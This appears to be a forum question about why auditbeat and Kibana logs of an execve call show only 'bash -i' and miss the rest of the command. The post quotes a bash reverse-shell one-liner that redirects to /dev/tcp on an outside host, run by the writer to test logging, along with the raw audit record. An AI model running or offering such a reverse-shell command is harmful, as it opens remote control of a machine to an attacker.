I am trying to decode the arguments of syscalls which I have in "execve" logs.
As these a0 to a3 fields are supposed to be encoded in hexadecimal I've tried to decode them to find out the args of the process but couldn't catch anything
in auditd "ausearch" utility would do the task or using "xxd -r -p" for the raw log of it, but here in auditbeat I can't find the way to decode the args
here is the example I have:
I ran this command on my host
bash -i &> /dev/tcp/myvps/6666 0>&1
But I only have these fields parsed in kibana
process.args: bash, -i
process.title: bash -i
and the event.original of it is:
type=SYSCALL msg=audit(1585588280.744:216616): arch=c000003e syscall=59 success=yes exit=0 a0=55ec60a91300 a1=55ec60b2e0a0 a2=55ec609c6a50 a3=7f7337c74cc0 items=2 ppid=1353 pid=1969 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=pts0 ses=2746 comm="bash" exe="/bin/bash" key="exec", type=EXECVE msg=audit(1585588280.744:216616): argc=2 a0="bash" a1="-i", type=CWD msg=audit(1585588280.744:216616): cwd="/home/kasra", type=PATH msg=audit(1585588280.744:216616): item=0 name="/bin/bash" inode=219 dev=fc:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0, type=PATH msg=audit(1585588280.744:216616): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=fc:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0, type=PROCTITLE msg=audit(1585588280.744:216616): proctitle=62617368002D69
there isn't any detail about rest args: &> /dev/tcp/myvps/6666 0>&1
I would appreciate any help in this case
auditbeat version: 7.5